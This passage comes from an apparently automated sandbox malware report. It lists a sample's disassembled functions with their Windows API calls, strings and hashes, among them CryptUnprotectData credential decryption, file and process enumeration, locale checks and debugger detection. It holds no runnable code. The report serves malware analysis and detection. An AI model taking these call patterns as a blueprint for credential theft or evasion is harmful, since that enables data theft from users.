CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00731D40
DeleteFileA.KERNEL32(00000000), ref: 00731DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00731E20
FindClose.KERNEL32(000000FF), ref: 00731E32

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Strings

P2#v, xrefs: 00731E20
\*.*, xrefs: 007317F1
1#v, xrefs: 00731923

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: P2#v$\*.*$1#v
API String ID: 1415058207-2075649900
Opcode ID: d559f7d923cef062890f90fad47e2c6b8fed7cb0666739647a07a7e1c0653bd7
Instruction ID: c5f2092c2eee8a66a758d10c768ebed576f2ef5e0cbf1d229c3f39d4ef96c659
Opcode Fuzzy Hash: d559f7d923cef062890f90fad47e2c6b8fed7cb0666739647a07a7e1c0653bd7
Instruction Fuzzy Hash: B9120071950118FBEB15FB60CC9AAEE737CAF54300F4145A9B50A62091EF786F89CFA1

Function 0073E430 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00750D73), ref: 0073E4A2
StrCmpCA.SHLWAPI(?,007514F8), ref: 0073E4F2
StrCmpCA.SHLWAPI(?,007514FC), ref: 0073E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0073EBDF

Strings

P2#v, xrefs: 0073EBDF
\*.*, xrefs: 0073E44D
s, xrefs: 0073EBF5, 0073E5EB, 0073E71C, 0073E85B, 0073E4B9, 0073E5EE, 0073E71F, 0073E85E
1#v, xrefs: 0073E4A2

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: P2#v$\*.*$1#v$s
API String ID: 433455689-4274704240
Opcode ID: 030fde31bb561ad0405ec40c0629326822a3fe396391b50018f95b0f7d1d41d0
Instruction ID: cf786f6fef99a9f092e015b018479db214e7fd5ad132aab0fd9619c08fc6108d
Opcode Fuzzy Hash: 030fde31bb561ad0405ec40c0629326822a3fe396391b50018f95b0f7d1d41d0
Instruction Fuzzy Hash: 7C125172950118FAEB15FB60DC9AEED737CAF54300F4145A8B50A96092EF386F49CF92

Function 00747B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

GetKeyboardLayoutList.USER32(00000000,00000000,007505AF), ref: 00747BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00747BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00747C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00747C62
LocalFree.KERNEL32(00000000), ref: 00747D22

Strings

/ , xrefs: 00747C7F

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 998b3c9c58f89d98ac63a233ca57142271bc6c82f6b5c821a3f921e3d1a3c696
Instruction ID: 5b78bbf0b36a3c56ddd5966f168c2ca906036524e80e61ccc42a3cfe5c8dc36d
Opcode Fuzzy Hash: 998b3c9c58f89d98ac63a233ca57142271bc6c82f6b5c821a3f921e3d1a3c696
Instruction Fuzzy Hash: E9413C71954218EBDB24DF94DC99BEEB3B8FF44700F204199E50962291DB782F85CFA1

Function 0073C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0073C853
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00FCD6A0), ref: 0073C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
memcpy.MSVCRT(?,?,?), ref: 0073C912
lstrcatA.KERNEL32(?,00750B46), ref: 0073C943
lstrcatA.KERNEL32(?,00750B47), ref: 0073C957
lstrcatA.KERNEL32(?,00750B4E), ref: 0073C978

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: faa7237e97471ad7cce1bf5ad2ee23b09197e3ddbdce849733c805c814574a0e
Instruction ID: 690275289c3e42ba2769a39bf309cc40b3d52d1e891c4ae0bf967dd30e28e304
Opcode Fuzzy Hash: faa7237e97471ad7cce1bf5ad2ee23b09197e3ddbdce849733c805c814574a0e
Instruction Fuzzy Hash: 394172B5D1421ADFDB10DFA4DD89BEEB7B8BB84304F1041A8F509A7280D7B45A84DF92

Function 00746920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0075110C,?,?,00746B11,00000000,?,00FC1558,?,0075110C,?,00000000,?), ref: 0074696C
sscanf.NTDLL ref: 00746999
SystemTimeToFileTime.KERNEL32(0075110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC1558,?,0075110C), ref: 007469B2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC1558,?,0075110C), ref: 007469C0
ExitProcess.KERNEL32 ref: 007469DA

Strings

u, xrefs: 007469C9

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID: u
API String ID: 2533653975-1051851173
Opcode ID: 2cffe91f5a23f85dcbb3391441ab475516813b84c5a60100008817753e81aa4e
Instruction ID: a590447a1137de83b38ee085b756cbfcc6d1df2f235f3cada85a5abf35b3bc44
Opcode Fuzzy Hash: 2cffe91f5a23f85dcbb3391441ab475516813b84c5a60100008817753e81aa4e
Instruction Fuzzy Hash: 00210176D14208ABCF04EFE4D9499EEB7B9FF48300F04852EE41AE3250EB345605CB66

Function 00739AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F

Strings

Ns, xrefs: 00739AD4, 00739AE1, 00739AF9, 00739B18, 00739AE4, 00739B1B

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: Ns
API String ID: 4291131564-1137170065
Opcode ID: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
Instruction ID: c4787a4aeeb88f3c8a88eaea842c65b36b23bca8c6babb5377c03c624cdceeb9
Opcode Fuzzy Hash: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
Instruction Fuzzy Hash: 8911A4B4240208EFEB10CF64DC95FAAB7B5FB89700F208058FA199B390C7B5A941DB51

Function 0074B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0074BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0074BBB7
UnhandledExceptionFilter.KERNEL32(0074F2A8), ref: 0074BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0074BBDE
TerminateProcess.KERNEL32(00000000), ref: 0074BBE5

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 451c52817e231c4eeaf14ac0f368b2d1d0198b2cf1b2a75e188e3cfd29e903a4
Instruction ID: 798aa962d04fc67b3453f59f978431bf7a936ec4805addd529815c5ef4fc47a0
Opcode Fuzzy Hash: 451c52817e231c4eeaf14ac0f368b2d1d0198b2cf1b2a75e188e3cfd29e903a4
Instruction Fuzzy Hash: 1221C6B55022049FDB42DF69ED88A943BF4BB08390F10941AE61D86270EBBC58C0CF29

Function 00737240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90), ref: 0073724D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00737281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00737C90,80000001,007461C4), ref: 007372A4
LocalFree.KERNEL32(?,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 007372AE

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
Instruction ID: 844faf56e5034fc5ca511bae41131f37904dbe9cdeba50e3db689475ce56314a
Opcode Fuzzy Hash: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
Instruction Fuzzy Hash: F30112B6B54208BBEB14DFD4CD46F9E7778FB44701F104154FB09AB2C0D6B4AA409BA6

Function 00749600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074961E
Process32First.KERNEL32(00750ACA,00000128), ref: 00749632
Process32Next.KERNEL32(00750ACA,00000128), ref: 00749647
StrCmpCA.SHLWAPI(?,00000000), ref: 0074965C
CloseHandle.KERNEL32(00750ACA), ref: 0074967A

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
Instruction ID: 1a4e9ef66a0bcef83310bf0bdff26d2a378712e78a38afbc0d164158f4b1a5ea
Opcode Fuzzy Hash: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
Instruction Fuzzy Hash: 99011E75A14208EBCB14DFA5CD48BEEB7F8EB48301F104188AA0997250D7349B80DF52

Function 00748EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00735184,40000001,00000000,00000000,?,00735184), ref: 00748EC0

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
Instruction ID: 1b6171c79ca659d935af32f6afdddbf28650493005a91f96fd8cce8071886f46
Opcode Fuzzy Hash: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
Instruction Fuzzy Hash: 64110675204208BFDB40CF64D884FAA33A9BF89700F109448F9198B250DB79E885EB62

Function 00739B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
memcpy.MSVCRT(?,?,?), ref: 00739BC6
LocalFree.KERNEL32(?), ref: 00739BD3

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: fb07ca574a124fbae48c2419a1e548b398d793a57527001074cc813c93eb90ca
Instruction ID: f1fe80db87adb250b2edf7381fab118d9b3174a9b7505320a279e61d49be1a1f
Opcode Fuzzy Hash: fb07ca574a124fbae48c2419a1e548b398d793a57527001074cc813c93eb90ca
Instruction Fuzzy Hash: 2E110CB8A00209DFDB04DF94D985AAEB7B9FF88300F104558F91997350D774AE50CF61

Function 00747A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000), ref: 00747A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A7D
wsprintfA.USER32 ref: 00747AB7

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
Instruction ID: 53553de3a79b1f70463da2062d917d9885e859450eb2732c1f0e2142222a8369
Opcode Fuzzy Hash: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
Instruction Fuzzy Hash: 921182B1A49218DBDB208B54DC49F99B778F744711F104399E90A932C0C7781E40CF51

Function 00743720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0074E118,00000000,00000001,0074E108,00000000), ref: 00743758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007437B0

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
